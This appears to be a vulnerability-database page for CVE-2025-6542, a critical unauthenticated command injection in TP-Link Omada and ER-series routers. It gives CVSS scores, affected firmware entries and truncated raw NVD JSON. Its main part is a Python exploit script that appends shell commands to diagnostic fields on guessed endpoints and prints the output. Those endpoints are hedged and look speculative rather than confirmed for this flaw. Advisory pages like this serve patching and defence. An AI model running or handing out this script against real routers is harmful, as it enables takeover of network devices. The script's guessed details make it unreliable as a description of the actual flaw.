Security Vulnerability Report
CVE-2025-6542 CVSS 9.8 CRITICAL

CVE-2025-6542

Published: 2025-10-21 01:15:37
Last Modified: 2025-10-24 13:50:11
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

An arbitrary OS command may be executed on the product by a remote unauthenticated attacker.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:er8411_firmware:*:*:*:*:*:*:*:* (versions before 1.3.3, per versionEndExcluding in the raw JSON below) - VULNERABLE
cpe:2.3:o:tp-link:er8411_firmware:1.3.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er8411:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er7412-m2_firmware:*:*:*:*:*:*:*:* (versions before 1.1.0, per versionEndExcluding in the raw JSON below) - VULNERABLE
cpe:2.3:o:tp-link:er7412-m2_firmware:1.1.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er7412-m2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er707-m2_firmware:*:*:*:*:*:*:*:* (versions before 1.3.1, per versionEndExcluding in the raw JSON below) - VULNERABLE
cpe:2.3:o:tp-link:er707-m2_firmware:1.3.1:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er707-m2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er7206_firmware:*:*:*:*:*:*:*:* (versions before 2.2.2, per versionEndExcluding in the raw JSON below) - VULNERABLE
cpe:2.3:o:tp-link:er7206_firmware:2.2.2:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er7206:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:er605_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:tp-link:er605_firmware:2.3.1:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:er605:-:*:*:*:*:*:*:* - NOT VULNERABLE
TP-Link Omada系列路由器(具体型号及版本请参考官方公告)
TP-Link Omada Pro路由器(具体型号及版本请参考官方公告)
TP-Link SOHO Festa网关(具体型号及版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-6542 - TP-Link Omada Router RCE PoC # Vulnerability: Unauthenticated Remote OS Command Injection # CVSS: 9.8 (Critical) import requests import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(target_url, cmd="id"): """ Exploit CVE-2025-6542: Unauthenticated OS command injection in TP-Link Omada routers and SOHO Festa gateways. """ target_url = target_url.rstrip('/') # Inject OS command via vulnerable parameter # The payload uses shell metacharacters to chain arbitrary commands payload = f";{cmd}" # Example vulnerable endpoint (adjust based on target firmware) vulnerable_endpoints = [ f"{target_url}/cgi-bin/luci/;stok=/admin/diagnostic", f"{target_url}/api/v1/diagnostic/tools", f"{target_url}/cgi-bin/luci/;stok=/api/diagnostic" ] headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-6542)", "Content-Type": "application/x-www-form-urlencoded", "Referer": target_url } # Command injection via ping/trace diagnostic parameters data = { "ip": f"127.0.0.1{payload}", "host": f"127.0.0.1{payload}", "target": f"127.0.0.1{payload}", "address": f"127.0.0.1{payload}" } for endpoint in vulnerable_endpoints: try: print(f"[*] Trying endpoint: {endpoint}") response = requests.post( endpoint, data=data, headers=headers, verify=False, timeout=10 ) if response.status_code == 200 and ("uid=" in response.text or "root" in response.text): print(f"[+] Command executed successfully!") print(f"[+] Output: {response.text}") return response.text except Exception as e: print(f"[-] Error: {e}") continue print("[-] Exploitation failed - target may be patched") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [command]") print(f"Example: {sys.argv[0]} https://192.168.0.1 'id'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" exploit(target, command)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6542", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2025-10-21T01:15:37.063", "lastModified": "2025-10-24T13:50:10.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary OS command may be executed on the product by a remote unauthenticated attacker."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", 
"cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er8411_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.3", "matchCriteriaId": "EE0D8327-33EE-4EF0-BC2F-F2A16D55762A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er8411_firmware:1.3.3:-:*:*:*:*:*:*", "matchCriteriaId": "6DB13EF6-0930-4575-92DC-AF431B2A2CEF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er8411:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F2F16D8-5D7B-4E01-8BB3-F324B6011F72"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7412-m2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.0", "matchCriteriaId": "14CE8275-E546-4598-901C-F52355DED3C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7412-m2_firmware:1.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "B79E0763-6D6F-4E59-91FC-D397A8BEF0F1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er7412-m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "FBB89DAE-6264-4F26-B34A-E1B84FB927D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er707-m2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.1", 
"matchCriteriaId": "48EDBC5B-BA54-4D11-9391-4FA7C7D4F5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er707-m2_firmware:1.3.1:-:*:*:*:*:*:*", "matchCriteriaId": "359ADA2C-F1A5-4840-8F84-2DBA8F4573C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er707-m2:-:*:*:*:*:*:*:*", "matchCriteriaId": "E45AF81F-1346-4FD8-9E38-CAB330D79AB6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7206_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.2", "matchCriteriaId": "AF595A8A-72CF-406E-BB0C-B76FDD51150B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:er7206_firmware:2.2.2:-:*:*:*:*:*:*", "matchCriteriaId": "8F66B05E-0D03-4B59-BCA3-7A2F40F092EE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:er7206:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB65324D-FD72-4C28-92AF-85BFF1E8A993"}]}]}, {"operator": " ... (truncated)